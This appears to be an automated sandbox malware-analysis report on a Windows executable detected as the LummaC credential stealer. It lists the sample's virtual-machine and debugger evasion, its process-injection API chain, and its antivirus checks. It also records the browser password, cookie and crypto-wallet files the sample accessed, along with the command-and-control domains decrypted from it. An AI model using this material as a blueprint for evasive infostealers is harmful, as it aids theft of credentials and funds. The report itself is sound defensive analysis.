Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Rgr8LJz.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Rgr8LJz.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Memory allocated: 1530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Window / User API: threadDelayed 6440

Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe TID: 7380	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe TID: 7788	Thread sleep count: 6440 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Last function: Thread delayed

Source: Rgr8LJz.exe, 00000003.00000002.2890700213.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Rgr8LJz.exe, 00000003.00000002.2890700213.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, Rgr8LJz.exe, 00000003.00000002.2890569724.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Rgr8LJz.exe

API call chain: ExitProcess graph end node

graph_3-14336

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Code function: 3_2_00441A80 LdrInitializeThunk,

3_2_00441A80

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 0_2_03087F21 mov edi, dword ptr fs:[00000030h]		0_2_03087F21
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 0_2_0308809E mov edi, dword ptr fs:[00000030h]		0_2_0308809E

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Code function: 0_2_03087F21 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_03087F21

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Memory written: C:\Users\user\Desktop\Rgr8LJz.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: robinsharez.shop
Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: handscreamny.shop
Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chipdonkeruz.shop
Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: versersleep.shop
Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crowdwarek.shop
Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: apporholis.shop
Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: femalsabler.shop
Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: soundtappysk.shop
Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cureprouderio.click

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process created: C:\Users\user\Desktop\Rgr8LJz.exe "C:\Users\user\Desktop\Rgr8LJz.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process created: C:\Users\user\Desktop\Rgr8LJz.exe "C:\Users\user\Desktop\Rgr8LJz.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Queries volume information: C:\Users\user\Desktop\Rgr8LJz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Rgr8LJz.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 3.2.Rgr8LJz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Rgr8LJz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rgr8LJz.exe.4089550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Rgr8LJz.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Rgr8LJz.exe, 00000003.00000002.2890700213.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: Rgr8LJz.exe, 00000003.00000002.2890700213.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Rgr8LJz.exe, 00000003.00000002.2890700213.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: o,{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"]
Source: Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: o,{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"]
Source: Rgr8LJz.exe, 00000003.00000002.2890700213.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
